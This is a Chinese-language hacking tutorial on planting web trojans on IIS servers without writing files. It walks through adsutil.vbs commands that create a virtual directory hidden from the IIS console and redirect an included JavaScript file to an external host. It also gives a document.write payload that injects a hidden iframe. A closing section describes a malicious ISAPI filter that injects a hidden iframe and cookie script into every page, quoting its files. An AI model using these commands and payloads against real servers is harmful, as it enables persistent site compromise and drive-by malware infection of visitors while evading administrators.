最新的無權限掛馬方式

我寫這文章並不是教大家怎麼跑去掛馬啊，掛馬是不對的！不過有的時候真的很想做些讓人覺得痛快的事情，因爲我就碰到很多的管理員，你跟他說服務器有問題吧！他不信，你改些東西警告他吧，他比你還勤快，你一改他馬上覆蓋回去，讓人真的很鬱悶。 還有在國外的一些機器上，什麼權限都拿到了也不知道他怎麼弄的，什麼都不讓寫，好不容易寫個文件沒一會又改回去了，真的讓人很!#$%%#%^#%^，據說就有一種軟件能監視重要的文件，一旦發現更改就會給恢復過去，譬如他監視web目錄的話我們就不能更改他網站的任何內容了。不過，看了很多大蝦的文章，自己也略微研究了下，也總算琢磨點東西出來，不用寫任何文件就可以實現將別人的頁面塗改和大家經常傳說的掛馬等等後果，這裏就給大家介紹下，那些只知道勤快的管理員也要小心了！

大家知道，我們瀏覽網站的時候都是服務器將信息處理成Html方式再返回給我們，而我們要實現的是當客戶訪問的時候能改變他們瀏覽器的內容，使他隱蔽的執行我們的東西如木馬等等。比較常見的方式就是引入Frame，設置屬性讓他在頁面不可見，或者不怕死的用javascript跳轉，比較高級點的會利用原代碼裏的Html元素如script標記或者frame標記，然後在這些標記裏引入的其他文件或者頁面裏做手腳，或者更改某些要在主頁上顯示的數據庫內容，如修改數據庫裏的公告實現掛馬。但是這些都需要在服務器的原代碼里加東西或者修改網站的內容，無論是跨站還是直接修改原代碼，這都是極其容易被發現的事，遇到一個勤快的管理員，你的東西就在服務器上呆不了多久了！還有就是如果一些頁面是不可寫的我們也很鬱悶，所以有必要尋找一種更隱蔽和更安全的掛馬方式解決上面的問題！

我們首先去Iis管理器裏看看吧！選中一個頁面看看他的屬性如圖一。呵呵，有個資源重定向吧！如果我們將這個頁面選擇重定向到我們已經控制的一個頁面那麼當瀏覽器請求這個頁面的時候將會轉而去訪問我們定義好的那個頁面，如果這個頁面是網頁木馬呢？很顯然，訪問者就會被掛馬！這是很簡單的方式，只需要在 IIs裏更改頁面的重定向就可以了！任何能接觸到IIS管理器的人都能輕易做到！但是這樣還有問題啊！如果管理員發現頁面總被跳轉，在檢查網站的文件以及用備份等手段恢復還是沒有解決問題的時候，他肯定會去IIS裏看！一不小心看到主頁面的屬性就會發現哪裏存在問題然後就可以改回去了！

那麼我們繼續看看有沒有更隱藏的方法！藉助以前掛馬者的方法，既然主頁面很容易被發現，那麼去看看主頁面裏的Html標記吧！如果發現有調用其他的頁面就好辦了！譬如裏面主頁裏有這樣的一個標記：

<script src=include/mm2.js></script>

那麼我們就有辦法了，去修改include/mms2.js的屬性吧！如圖二，轉到我們的某個頁面，內容當然要能在script標記裏解釋的了，如：

document.write("<8))e style=display:none; src=http://jnclovesw.com width=0 height=0></8))e>");

這樣就可以引入我們的頁面了！當然最好還是先實現他JS的功能！那樣纔夠隱蔽！現在管理員會發現首頁沒有更改，去IIs 裏看首頁的屬性也沒有更改，甚至主機上的任何www文件都沒有修改，他會很鬱悶吧！呵呵！如果他只是把以前的網站備份恢復回去也是沒有辦法把頁面改回去的！IIs文件那麼多他總不能一個一個看屬性吧！這裏順便提個問題，就是你選擇重定向過去的文件必須是能被引用他的html標記能解釋的，否則是沒有效果的！譬如一個<img src=1.jpg>你把1.jpg重定向到我們的木馬頁面是沒有用的，因爲木馬頁面沒有被當成Html解析，而是送到img標籤裏當成圖片了！我想到的能利用的標記也就是script還有frame，至於Css，我想也是能利用的，但是利用方法我還沒有找到！也不知道我分析得對不對，歡迎大家指教啊！
讓我們繼續吧！假設萬一你的管理員夠厲害或者夠勤快，他發現了你在mm2.js上面做了手腳，他就會從IIs裏面把他恢復過去！我們的夢想又破滅了！有沒有更隱蔽的方法呢？讓管理員在IIs裏面都找不到呢？答案是肯定的！大家一定記得很久前的那個IIS配置漏洞，可以建立一個看不見的虛擬目錄，然後在裏面建立後門！我們也可以借來利用哦！看看IIS配置漏洞的原理是說建立一個沒有物理目錄的虛擬目錄，這樣就會在IIs裏不可見，然後就可以在這個目錄裏做些小動作了！這裏我們先建立一個不可見的虛擬目錄，如果主頁裏調用了include文件夾下的js文件，我們就建立include目錄吧！這可以藉助IIS 的腳本實現，其中adsutil.vbs腳本是在IIs的安裝目錄如C:InetpubAdminScripts下的，是控制IIS行爲的一個腳本，我們用到的命令如下：

cscript adsutil.vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"

這樣就會建立了個IIs裏不可見的虛擬目錄，因爲沒有設置路徑所以不會顯示哦！然後再在這個目錄下建立一個名字叫做mm2.js的虛擬目錄，呵呵！居然建立虛擬目錄是可以用到.等特殊字符的：

cscript adsutil.vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"

這樣就存在一個include/mm2.js的虛擬目錄了！想到什麼了？是不是跟主頁裏調用的那個文件名字一直的哦！我們繼續往下做！

cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect "http://jnclovesw.com/mm1.js"

這樣是更改mm2.js虛擬目錄的重定向特性，如圖三。注意其中的W3SVC/1/Root/www/代表IIs下的第一個web服務器的www虛擬目錄，大家不清楚的話可以用adsutil.vbs的enum參數去查詢自己需要更改的網站，其他的操作可以打開 adsutil.vbs腳本的幫助看看！這樣操作之後就設置了虛擬目錄的重定向特性，現在試着在主頁裏調用include/mm2.js，你猜猜返回的是 mm2.js的內容還是我們的mm1.js的內容呢？答案是mm1.js，如圖四，並且物理文件還是存在的！這也許是IIS的特性吧！他首先處理用戶的請求，並且虛擬目錄優先於物理文件！然後我們去IIS裏看看有不有include虛擬目錄吧！如圖五，沒有吧！呵呵！這樣我們就成功的饒過權限的限制和管理員的檢測！將我們的木馬掛到了對方的網站上，並且除非對方重做IIs或者刪除我們隱藏的虛擬目錄，否則他是很難清除我們的木馬的！

文章很簡單，關鍵是IIS腳本的命令和對IIs的一些認識，這種掛馬方式適合於得到管理員權限之後掛馬，對付那些只是勤快的管理員還是很有用的！大家以後發現網站存在問題記得要用這個腳本查看下有不有問題哦！或者乾脆把IIS的設置也備份吧！遇到問題把IIs的設置也還原，呵呵！


2.全服務器被掛馬 網頁源文件中卻找不到掛馬代碼
一臺服務器 幾乎所有網站打開網頁 甚至HTML網頁 都出現了

<8))e src="http://xxxdfsfd/web.htm" height=0 width=0></8))e>

這種樣式的代碼 一般在頭部 部分殺毒軟件打開會報毒

打開HTML或ASP PHP頁面 在源碼中怎麼也找不到這段代碼

起初會懷疑是JS 找了半天還是沒有發現 連新建的HTML頁面 也會有這段代碼～

仔細尋找 問題應該在IIS上 打開IIS 重新啓動一次 在主IIS上 右鍵屬性 ISAPI 發現一個ISAPI擴展 沒見過的

路徑爲：c:windowshelpwanps.dll ISAP加載正常 綠色狀態

取消 重新啓動IIS 所有代碼消失

加載項包含了三個文件：


wanps.ini內容爲：


Cookie=GAG5=ABCDEFG
Redirector=C:windowshelpwanps.txt

wanps.txt內容爲：


<body>
<8))e src="http://xxx.com/web.htm" height=0 width=0></8))e>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>